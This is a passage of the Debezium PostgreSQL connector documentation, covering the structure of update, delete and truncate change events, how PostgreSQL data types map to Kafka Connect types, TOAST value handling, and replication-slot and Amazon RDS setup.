fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that contains values that were in the row before the database commit. In this example, only the primary key column, `id`, is present because the table's {link-prefix}:{link-postgresql-connector}#postgresql-replica-identity[`REPLICA IDENTITY`] setting is, by default, `DEFAULT`.\n+\nFor an _update_ event to contain the previous values of all columns in the row, you would have to change the `customers` table by running `ALTER TABLE customers REPLICA IDENTITY FULL`.\n\n|2\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `first_name` value is now `Anne Marie`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database and table that contains the new row\n* Schema name\n* If the event was part of a snapshot (alwas `false` for _update_ events)\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-postgresql-connector}#postgresql-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section.\n====\n\n\/\/ Type: continue\n[[postgresql-primary-key-updates]]\n=== Primary key updates\n\nAn `UPDATE` operation that changes a row's primary key field(s) is known\nas a primary key change. For a primary key change, in place of sending an `UPDATE` event record, the connector sends a `DELETE` event record for the old key and a `CREATE` event record for the new (updated) key. These events have the usual structure and content, and in addition, each one has a message header related to the primary key change:\n\n* The `DELETE` event record has `__debezium.newkey` as a message header. The value of this header is the new primary key for the updated row.\n\n* The `CREATE` event record has `__debezium.oldkey` as a message header. The value of this header is the previous (old) primary key that the updated row had.\n\n\/\/ Type: continue\n[[postgresql-delete-events]]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": false,\n \"db\": \"postgres\",\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 556,\n \"lsn\": 46523128,\n \"xmin\": null\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit. +\n +\nIn this example, the `before` field contains only the primary key column because the table's {link-prefix}:{link-postgresql-connector}#postgresql-replica-identity[`REPLICA IDENTITY`] setting is `DEFAULT`.\n\n|2\n|`after`\n|Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `lsn` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Database and table that contained the deleted row\n* Schema name\n* If the event was part of a snapshot (alwas `false` for _delete_ events)\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row.\n\n[WARNING]\n====\nFor a consumer to be able to process a _delete_ event generated for a table that does not have a primary key, set the table's `REPLICA IDENTITY` to `FULL`. When a table does not have a primary key and the table's `REPLICA IDENTITY` is set to `DEFAULT` or `NOTHING`, a _delete_ event has no `before` field.\n====\n\nPostgreSQL connector events are designed to work with link:{link-kafka-docs}#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n\/\/ Type: continue\n[[postgresql-tombstone-events]]\n.Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, the PostgreSQL connector follows a _delete_ event with a special _tombstone_ event that has the same key but a `null` value.\n\n\/\/ Type: continue\n[[postgresql-truncate-events]]\n=== _truncate_ events\n\nA _truncate_ change event signals that a table has been truncated.\nThe message key is `null` in this case, the message value looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"source\": { \/\/ <1>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": false,\n \"db\": \"postgres\",\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 556,\n \"lsn\": 46523128,\n \"xmin\": null\n },\n \"op\": \"t\", \/\/ <2>\n \"ts_ms\": 1559033904961 \/\/ <3>\n }\n}\n----\n\n.Descriptions of _truncate_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _truncate_ event value, the `source` field structure is the same as for _create_, _update_, and _delete_ events for the same table, provides this metadata:\n\n* {prodname} version\n* Connector type and name\n* Database and table that contains the new row\n* Schema name\n* If the event was part of a snapshot (alwas `false` for _delete_ events)\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|2\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `t`, signifying that this table was truncated.\n\n|3\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nIn case a single `TRUNCATE` statement applies to multiple tables,\none _truncate_ change event record for each truncated table will be emitted.\n\nNote that since _truncate_ events represent a change made to an entire table and don't have a message key,\nunless you're working with topics with a single partition,\nthere are no ordering guarantees for the change events pertaining to a table (_create_, _update_, etc.) and _truncate_ events for that table.\nFor instance a consumer may receive an _update_ event only after a _truncate_ event for that table,\nwhen those events are read from different partitions.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-postgresql-connectors-map-data-types\n\/\/ Title: How {prodname} PostgreSQL connectors map data types\n[[postgresql-data-types]]\n== Data type mappings\n\nThe PostgreSQL connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the PostgreSQL data type of the column. The following sections describe how the connector maps PostgreSQL data types to a _literal type_ and a _semantic type_ in event fields.\n\n* _literal type_ describes how the value is literally represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\n\n* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:postgresql-basic-types[]\n* xref:postgresql-temporal-types[]\n* xref:postgresql-timestamp-type[]\n* xref:postgresql-decimal-types[]\n* xref:postgresql-hstore-type[]\n* xref:postgresql-domain-types[]\n* xref:postgresql-network-address-types[]\n* xref:postgresql-postgis-types[]\n* xref:postgresql-toasted-values[]\n\nendif::product[]\n\n[id=\"postgresql-basic-types\"]\n=== Basic types\n\nThe following table describes how the connector maps basic types.\n\n.Mappings for PostgreSQL basic data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`BOOLEAN`\n|`BOOLEAN`\n|n\/a\n\n|`BIT(1)`\n|`BOOLEAN`\n|n\/a\n\n|`BIT( > 1)`\n|`BYTES`\n|`io.debezium.data.Bits` +\n +\nThe `length` schema parameter contains an integer that represents the number of bits. The resulting `byte[]` contains the bits in little-endian form and is sized to contain the specified number of bits. For example, `numBytes = n\/8 + (n % 8 == 0 ? 0 : 1)` where `n` is the number of bits.\n\n|`BIT VARYING[(M)]`\n|`BYTES`\n|`io.debezium.data.Bits` +\n +\nThe `length` schema parameter contains an integer that represents the number of bits (2^31 - 1 in case no length is given for the column). The resulting `byte[]` contains the bits in little-endian form and is sized based on the content. The specified size `(M)` is stored in the length parameter of the `io.debezium.data.Bits` type.\n\n|`SMALLINT`, `SMALLSERIAL`\n|`INT16`\n|n\/a\n\n|`INTEGER`, `SERIAL`\n|`INT32`\n|n\/a\n\n|`BIGINT`, `BIGSERIAL`, `OID`\n|`INT64`\n|n\/a\n\n|`REAL`\n|`FLOAT32`\n|n\/a\n\n|`DOUBLE PRECISION`\n|`FLOAT64`\n|n\/a\n\n|`CHAR[(M)]`\n|`STRING`\n|n\/a\n\n|`VARCHAR[(M)]`\n|`STRING`\n|n\/a\n\n|`CHARACTER[(M)]`\n|`STRING`\n|n\/a\n\n|`CHARACTER VARYING[(M)]`\n|`STRING`\n|n\/a\n\n|`TIMESTAMPTZ`, `TIMESTAMP WITH TIME ZONE`\n|`STRING`\n|`io.debezium.time.ZonedTimestamp` +\n +\nA string representation of a timestamp with timezone information, where the timezone is GMT.\n\n|`TIMETZ`, `TIME WITH TIME ZONE`\n|`STRING`\n|`io.debezium.time.ZonedTime` +\n +\nA string representation of a time value with timezone information, where the timezone is GMT.\n\n|`INTERVAL [P]`\n|`INT64`\n|`io.debezium.time.MicroDuration` +\n(default) +\n +\nThe approximate number of microseconds for a time interval using the `365.25 \/ 12.0` formula for days per month average.\n\n|`INTERVAL [P]`\n|`STRING`\n|`io.debezium.time.Interval` +\n(when `interval.handling.mode` is set to `string`) +\n +\nThe string representation of the interval value that follows the pattern `P<years>Y<months>M<days>DT<hours>H<minutes>M<seconds>S`, for example, `P1Y2M3DT4H5M6.78S`.\n\n|`BYTEA`\n|`BYTES` or `STRING`\n|n\/a +\n +\nEither the raw bytes (the default), a base64-encoded string, or a hex-encoded string, based on the connector's {link-prefix}:{link-postgresql-connector}#postgresql-property-binary-handling-mode[binary handling mode] setting.\n\n|`JSON`, `JSONB`\n|`STRING`\n|`io.debezium.data.Json` +\n +\nContains the string representation of a JSON document, array, or scalar.\n\n|`XML`\n|`STRING`\n|`io.debezium.data.Xml` +\n +\nContains the string representation of an XML document.\n\n|`UUID`\n|`STRING`\n|`io.debezium.data.Uuid` +\n +\nContains the string representation of a PostgreSQL UUID value.\n\n|`POINT`\n|`STRUCT`\n|`io.debezium.data.geometry.Point` +\n +\nContains a structure with two `FLOAT64` fields, `(x,y)`. Each field represents the coordinates of a geometric point.\n\n|`LTREE`\n|`STRING`\n|`io.debezium.data.Ltree` +\n +\nContains the string representation of a PostgreSQL LTREE value.\n\n|`CITEXT`\n|`STRING`\n|n\/a\n\n|`INET`\n|`STRING`\n|n\/a\n\n|`INT4RANGE`\n|`STRING`\n|n\/a +\n +\nRange of integer.\n\n|`INT8RANGE`\n|`STRING`\n|n\/a +\n +\nRange of `bigint`.\n\n|`NUMRANGE`\n|`STRING`\n|n\/a +\n +\nRange of `numeric`.\n\n|`TSRANGE`\n|`STRING`\n|n\/a +\n +\nContains the string representation of a timestamp range without a time zone.\n\n|`TSTZRANGE`\n|`STRING`\n|n\/a +\n +\nContains the string representation of a timestamp range with the local system time zone.\n\n|`DATERANGE`\n|`STRING`\n|n\/a +\n +\nContains the string representation of a date range. It always has an exclusive upper-bound.\n\n|`ENUM`\n|`STRING`\n|`io.debezium.data.Enum` +\n +\nContains the string representation of the PostgreSQL `ENUM` value. The set of allowed values is maintained in the `allowed` schema parameter.\n\n|===\n\n[id=\"postgresql-temporal-types\"]\n=== Temporal types\n\nOther than PostgreSQL's `TIMESTAMPTZ` and `TIMETZ` data types, which contain time zone information, how temporal types are mapped depends on the value of the `time.precision.mode` connector configuration property. The following sections describe these mappings:\n\n* xref:postgresql-time-precision-mode-adaptive[`time.precision.mode=adaptive`]\n* xref:postgresql-time-precision-mode-adaptive-time-microseconds[`time.precision.mode=adaptive_time_microseconds`]\n* xref:postgresql-time-precision-mode-connect[`time.precision.mode=connect`]\n\n[[postgresql-time-precision-mode-adaptive]]\n.`time.precision.mode=adaptive`\nWhen the `time.precision.mode` property is set to `adaptive`, the default, the connector determines the literal type and semantic type based on the column's data type definition. This ensures that events _exactly_ represent the values in the database.\n\n.Mappings when `time.precision.mode` is `adaptive`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nRepresents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the number of microseconds past midnight, and does not include timezone information.\n\n|`TIMESTAMP(1)`, `TIMESTAMP(2)`, `TIMESTAMP(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`TIMESTAMP(4)`, `TIMESTAMP(5)`, `TIMESTAMP(6)`, `TIMESTAMP`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds since the epoch, and does not include timezone information.\n\n|===\n\n[[postgresql-time-precision-mode-adaptive-time-microseconds]]\n.`time.precision.mode=adaptive_time_microseconds`\nWhen the `time.precision.mode` configuration property is set to `adaptive_time_microseconds`, the connector determines the literal type and semantic type for temporal types based on the column's data type definition. This ensures that events _exactly_ represent the values in the database, except all `TIME` fields are captured as microseconds.\n\n.Mappings when `time.precision.mode` is `adaptive_time_microseconds`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the time value in microseconds and does not include timezone information. PostgreSQL allows precision `P` to be in the range 0-6 to store up to microsecond precision.\n\n|`TIMESTAMP(1)` , `TIMESTAMP(2)`, `TIMESTAMP(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds past the epoch, and does not include timezone information.\n\n|`TIMESTAMP(4)` , `TIMESTAMP(5)`, `TIMESTAMP(6)`, `TIMESTAMP`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds past the epoch, and does not include timezone information.\n\n|===\n\n[[postgresql-time-precision-mode-connect]]\n.`time.precision.mode=connect`\nWhen the `time.precision.mode` configuration property is set to `connect`, the connector uses Kafka Connect logical types. This may be useful when consumers can handle only the built-in Kafka Connect logical types and are unable to handle variable-precision time values. However, since PostgreSQL supports microsecond precision, the events generated by a connector with the `connect` time precision mode *results in a loss of precision* when the database column has a _fractional second precision_ value that is greater than 3.\n\n.Mappings when `time.precision.mode` is `connect`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Time` +\n +\nRepresents the number of milliseconds since midnight, and does not include timezone information. PostgreSQL allows `P` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n\n|`TIMESTAMP([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information. PostgreSQL allows `P` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n\n|===\n\n[id=\"postgresql-timestamp-type\"]\n=== TIMESTAMP type\n\nThe `TIMESTAMP` type represents a timestamp without time zone information.\nSuch columns are converted into an equivalent Kafka Connect value based on UTC. For example, the `TIMESTAMP` value \"2018-06-20 15:13:16.945104\" is represented by an `io.debezium.time.MicroTimestamp` with the value \"1529507596945104\" when `time.precision.mode` is not set to `connect`.\n\nThe timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.\n\nPostgreSQL supports using `+\/-infinite` values in `TIMESTAMP` columns.\nThese special values are converted to timestamps with value `9223372036825200000` in case of positive infinity or `-9223372036832400000` in case of negative infinity.\nThis behaviour mimics the standard behaviour of PostgreSQL JDBC driver - see `org.postgresql.PGStatement` interface for reference.\n\n[id=\"postgresql-decimal-types\"]\n=== Decimal types\n\nThe setting of the PostgreSQL connector configuration property, `decimal.handling.mode` determines how the connector maps decimal types.\n\nWhen the `decimal.handling.mode` property is set to `precise`, the connector uses the Kafka Connect `org.apache.kafka.connect.data.Decimal` logical type for all `DECIMAL` and `NUMERIC` columns. This is the default mode.\n\n.Mappings when `decimal.handling.mode` is `precise`\n[cols=\"28%a,17%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`NUMERIC[(M[,D])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer representing how many digits the decimal point was shifted.\n\n|`DECIMAL[(M[,D])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer representing how many digits the decimal point was shifted.\n\n|===\n\nThere is an exception to this rule.\nWhen the `NUMERIC` or `DECIMAL` types are used without scale constraints, the values coming from the database have a different (variable) scale for each value. In this case, the connector uses `io.debezium.data.VariableScaleDecimal`, which contains both the value and the scale of the transferred value.\n\n.Mappings of decimal types when there are no scale constraints\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`NUMERIC`\n|`STRUCT`\n|`io.debezium.data.VariableScaleDecimal` +\n +\nContains a structure with two fields: `scale` of type `INT32` that contains the scale of the transferred value and `value` of type `BYTES` containing the original value in an unscaled form.\n\n|`DECIMAL`\n|`STRUCT`\n|`io.debezium.data.VariableScaleDecimal` +\n +\nContains a structure with two fields: `scale` of type `INT32` that contains the scale of the transferred value and `value` of type `BYTES` containing the original value in an unscaled form.\n\n|===\n\nWhen the `decimal.handling.mode` property is set to `double`, the connector represents all `DECIMAL` and `NUMERIC` values as Java double values and encodes them as shown in the following table.\n\n.Mappings when `decimal.handling.mode` is `double`\n[cols=\"30%a,30%a,40%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name)\n\n|`NUMERIC[(M[,D])]`\n|`FLOAT64`\n|\n\n|`DECIMAL[(M[,D])]`\n|`FLOAT64`\n|\n\n|===\n\nThe last possible setting for the `decimal.handling.mode` configuration property is `string`. In this case, the connector represents `DECIMAL` and `NUMERIC` values as their formatted string representation, and encodes them as shown in the following table.\n\n.Mappings when `decimal.handling.mode` is `string`\n[cols=\"30%a,30%a,40%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name)\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\n|\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\n|\n\n|===\n\nPostgreSQL supports `NaN` (not a number) as a special value to be stored in `DECIMAL`\/`NUMERIC` values when the setting of `decimal.handling.mode` is `string` or `double`. In this case, the connector encodes `NaN` as either `Double.NaN` or the string constant `NAN`.\n\n[id=\"postgresql-hstore-type\"]\n=== HSTORE type\n\nWhen the `hstore.handling.mode` connector configuration property is set to `json` (the default), the connector represents `HSTORE` values as string representations of JSON values and encodes them as shown in the following table. When the `hstore.handling.mode` property is set to `map`, the connector uses the `MAP` schema type for `HSTORE` values.\n\n.Mappings for `HSTORE` data type\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`HSTORE`\n|`STRING`\n|`io.debezium.data.Json` +\n +\nExample: output representation using the JSON converter is `{\\\"key\\\" : \\\"val\\\"}`\n\n|`HSTORE`\n|`MAP`\n|n\/a +\n +\nExample: output representation using the JSON converter is `{\"key\" : \"val\"}`\n\n|===\n\n[id=\"postgresql-domain-types\"]\n=== Domain types\n\nPostgreSQL supports user-defined types that are based on other underlying types. When such column types are used, {prodname} exposes the column's representation based on the full type hierarchy.\n\n[IMPORTANT]\n====\nCapturing changes in columns that use PostgreSQL domain types requires special consideration. When a column is defined to contain a domain type that extends one of the default database types and the domain type defines a custom length or scale, the generated schema inherits that defined length or scale.\n\nWhen a column is defined to contain a domain type that extends another domain type that defines a custom length or scale, the generated schema does *not* inherit the defined length or scale because that information is not available in the PostgreSQL driver's column metadata.\n====\n\n[id=\"postgresql-network-address-types\"]\n=== Network address types\n\nPostgreSQL has data types that can store IPv4, IPv6, and MAC addresses. It is better to use these types instead of plain text types to store network addresses. Network address types offer input error checking and specialized operators and functions.\n\n.Mappings for network address types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`INET`\n|`STRING`\n|n\/a +\n +\nIPv4 and IPv6 networks\n\n|`CIDR`\n|`STRING`\n|n\/a +\n +\nIPv4 and IPv6 hosts and networks\n\n|`MACADDR`\n|`STRING`\n|n\/a +\n +\nMAC addresses\n\n|`MACADDR8`\n|`STRING`\n|n\/a +\n +\nMAC addresses in EUI-64 format\n\n|===\n\n[id=\"postgresql-postgis-types\"]\n=== PostGIS types\n\nThe PostgreSQL connector supports all link:http:\/\/postgis.net[PostGIS data types].\n\n.Mappings of PostGIS data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostGIS data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`GEOMETRY` +\n(planar)\n|`STRUCT`\na|`io.debezium.data.geometry.Geometry` +\n +\nContains a structure with two fields: +\n\n* `srid (INT32)` - Spatial Reference System Identifier that defines what type of geometry object is stored in the structure.\n* `wkb (BYTES)` - A binary representation of the geometry object encoded in the Well-Known-Binary format. +\n\nFor format details, see link:http:\/\/www.opengeospatial.org\/standards\/sfa[Open Geospatial Consortium Simple Features Access specification].\n\n|`GEOGRAPHY` +\n(spherical)\n|`STRUCT`\n|`io.debezium.data.geometry.Geography` +\n +\nContains a structure with two fields: +\n\n* `srid (INT32)` - Spatial Reference System Identifier that defines what type of geography object is stored in the structure.\n* `wkb (BYTES)` - A binary representation of the geometry object encoded in the Well-Known-Binary format. +\n\nFor format details, see http:\/\/www.opengeospatial.org\/standards\/sfa[Open Geospatial Consortium Simple Features Access specification].\n\n|===\n\n[id=\"postgresql-toasted-values\"]\n=== Toasted values\nPostgreSQL has a hard limit on the page size.\nThis means that values that are larger than around 8 KBs need to be stored by using link::https:\/\/www.postgresql.org\/docs\/current\/storage-toast.html[TOAST storage].\nThis impacts replication messages that are coming from the database. Values that were stored by using the TOAST mechanism and that have not been changed are not included in the message, unless they are part of the table's replica identity.\nThere is no safe way for {prodname} to read the missing value out-of-bands directly from the database, as this would potentially lead to race conditions. Consequently, {prodname} follows these rules to handle toasted values:\n\n* Tables with `REPLICA IDENTITY FULL` - TOAST column values are part of the `before` and `after` fields in change events just like any other column.\n* Tables with `REPLICA IDENTITY DEFAULT` - When receiving an `UPDATE` event from the database, any unchanged TOAST column value that is not part of the replica identity is not contained in the event.\nSimilarly, when receiving a `DELETE` event, no TOAST columns, if any, are in the `before` field.\nAs {prodname} cannot safely provide the column value in this case, the connector returns a placeholder value as defined by the connector configuration property, `toasted.value.placeholder`.\n\nifdef::community[]\n[IMPORTANT]\n====\nThere is a problem related to Amazon RDS instances. The `wal2json` plug-in has evolved over the time and there were releases that provided out-of-band toasted values. Amazon supports different versions of the plug-in for different PostgreSQL versions. See https:\/\/docs.aws.amazon.com\/AmazonRDS\/latest\/UserGuide\/CHAP_PostgreSQL.html[Amazon's documentation] to obtain version to version mapping. For consistent toasted values handling:\n\n* Use the `pgoutput` plug-in for PostgreSQL 10+ instances.\n* Set `include-unchanged-toast=0` for older versions of the `wal2json` plug-in by using the `slot.stream.params` configuration option.\n====\nendif::community[]\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-postgresql-to-run-a-debezium-connector\n\/\/ Title: Setting up PostgreSQL to run a {prodname} connector\n[[setting-up-postgresql]]\n== Set up\n\nifdef::community[]\nBefore using the PostgreSQL connector to monitor the changes committed on a PostgreSQL server, decide which logical decoding plug-in you intend to use.\nIf you plan *not* to use the native `pgoutput` logical replication stream support, then you must install the logical decoding plug-in into the PostgreSQL server. Afterward, enable a replication slot, and configure a user with sufficient privileges to perform the replication.\n\nIf your database is hosted by a service such as link:https:\/\/www.heroku.com\/postgres[Heroku Postgres] you might be unable to install the plug-in. If so, and if you are using PostgreSQL 10+, you can use the `pgoutput` decoder support to capture changes in your database. If that is not an option, you are unable to use {prodname} with your database.\nendif::community[]\n\nifdef::product[]\nThis release of {prodname} supports only the native `pgoutput` logical replication stream. To set up PostgreSQL so that it uses the `pgoutput` plug-in, you must enable a replication slot, and configure a user with sufficient privileges to perform the replication.\n\nDetails are in the following topics:\n\n* xref:configuring-a-replication-slot-for-the-debezium-pgoutput-plug-in[]\n* xref:setting-up-postgresql-permissions-required-by-debezium-connectors[]\n* xref:setting-privileges-to-permit-debezium-user-to-create-postgresql-publications[]\n* xref:configuring-postgresql-to-allow-replication-with-the-connector-host[]\n* xref:configuring-postgresql-to-manage-debezium-wal-disk-space-consumption[]\n\nendif::product[]\n\nifdef::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: configuring-a-replication-slot-for-the-debezium-pgoutput-plug-in\n\/\/ Title: Configuring a replication slot for the {prodname} `pgoutput` plug-in\n=== Configuring replication slot\n\nPostgreSQL's logical decoding uses replication slots. To configure a replication slot, specify the following in the `postgresql.conf` file:\n\n[source]\n----\nwal_level=logical\nmax_wal_senders=1\nmax_replication_slots=1\n----\n\nThese settings instruct the PostgreSQL server as follows:\n\n* `wal_level` - Use logical decoding with the write-ahead log.\n* `max_wal_senders` - Use a maximum of one separate process for processing WAL changes.\n* `max_replication_slots` - Allow a maximum of one replication slot to be created for streaming WAL changes.\n\nReplication slots are guaranteed to retain all WAL entries that are required for {prodname} even during {prodname} outages. Consequently, it is important to closely monitor replication slots to avoid:\n\n* Too much disk consumption\n* Any conditions, such as catalog bloat, that can happen if a replication slot stays unused for too long\n\nFor more information, see the link:https:\/\/www.postgresql.org\/docs\/current\/warm-standby.html#STREAMING-REPLICATION-SLOTS[PostgreSQL documentation for replication slots].\n\n[NOTE]\n====\nFamiliarity with the mechanics and link:https:\/\/www.postgresql.org\/docs\/current\/static\/wal-configuration.html[configuration of the PostgreSQL write-ahead log] is helpful for using the {prodname} PostgreSQL connector.\n====\nendif::product[]\n\nifdef::community[]\n[[postgresql-in-the-cloud]]\n=== PostgreSQL in the Cloud\n\n[[postgresql-on-amazon-rds]]\n==== PostgreSQL on Amazon RDS\n\nIt is possible to capture changes in a PostgreSQL database that is running in link:https:\/\/aws.amazon.com\/rds\/[Amazon RDS]. To do this:\n\n* Set the instance parameter `rds.logical_replication` to `1`.\n* Verify that the `wal_level` parameter is set to `logical` by running the query `SHOW wal_level` as the database RDS master user.\n This might not be the case in multi-zone replication setups.\n You cannot set this option manually.\n It is link:https:\/\/docs.aws.amazon.com\/AmazonRDS\/latest\/UserGuide\/USER_WorkingWithParamGroups.html[automatically changed] when the `rds.logical_replication` parameter is set to `1`.\n If the `wal_level` is not set to `logical` after you make the preceding change, it is probably because the instance has to be restarted after the parameter group change.\n Restarts occur during your maintenance window, or you can initiate a restart manually.\n* Set the {prodname} `plugin.name` parameter to `wal2json`. You can skip this on PostgreSQL 10+ if you plan to use `pgoutput` logical replication stream support.\n* Initiate logical replication from an AWS account that has the `rds_replication` role.\n The role grants permissions to manage logical slots and to stream data using logical slots.\n By default, only the master user account on AWS has the `rds_replication` role on Amazon RDS.\n To enable a user account other than the master account to initiate logical replication, you must grant the account the `rds_replication` role.\n For example, `grant rds_replication to _<my_user>_`. You must have `superuser` access to grant the `rds_replication` role to a user.\n To enable 